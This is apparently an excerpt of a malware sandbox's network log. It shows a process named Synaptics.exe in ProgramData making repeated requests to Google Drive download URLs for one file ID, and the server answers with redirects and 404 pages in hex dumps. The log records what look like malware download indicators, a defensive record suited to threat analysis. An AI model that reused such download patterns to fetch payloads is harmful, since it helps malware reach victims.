                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:24 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 63 51 42 70 6e 45 79 39 76 70 74 2d 53 75 5f 46 33 33 4a 7a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="rcQBpnEy9vpt-Su_F33JzQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:24 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        61192.168.2.750038142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:24 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:25 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4D-GG-RPf1eawJzoz9UdypHlaJREhrExNkmAj3txLz2p8dIWu2IY-E7haAGDNfF1YY
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:24 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-U5vZzP7wGK2O9taR9Pi_rQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:25 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:25 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 50 75 58 6c 66 4c 65 76 5a 4b 38 6b 31 57 66 32 79 71 55 54 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="NPuXlfLevZK8k1Wf2yqUTg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:25 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        62192.168.2.750039142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:24 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:24 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-dtB3mH6gVfZxiy7rpzZZiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        63192.168.2.750037142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:24 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:24 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-e-Pznp9s6MlYbye9wuEc2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        64192.168.2.750041142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:24 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:25 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4iHpJ_FutwIKcUQSjSpPUTvSXHL81hvbkq4dBjDM8NZu_B5tOxBc1FBj5XjN2lCPMS
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:25 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-m-0ljyCkE6a4MskDahHYVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:25 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:25 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 78 38 79 42 35 64 35 65 64 61 78 38 62 66 76 42 6e 6e 62 35 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="0x8yB5d5edax8bfvBnnb5Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:25 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        65192.168.2.750050142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:25 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:25 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-2XMzhCP0DtDwVJt_vUSafQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        66192.168.2.750049142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:25 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:25 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-YPpg3U94D1O98iGfatLnFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        67192.168.2.750052142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:25 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:26 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC45BIOhOERzdvA9VjdHpPsxsXEI7YV1viQZGBAOD4oB752YF6dBLrY04yw2ATVCZIAxWMW9IYk
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:25 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-p3s5diROrRGM6ULqVv9B4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:26 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
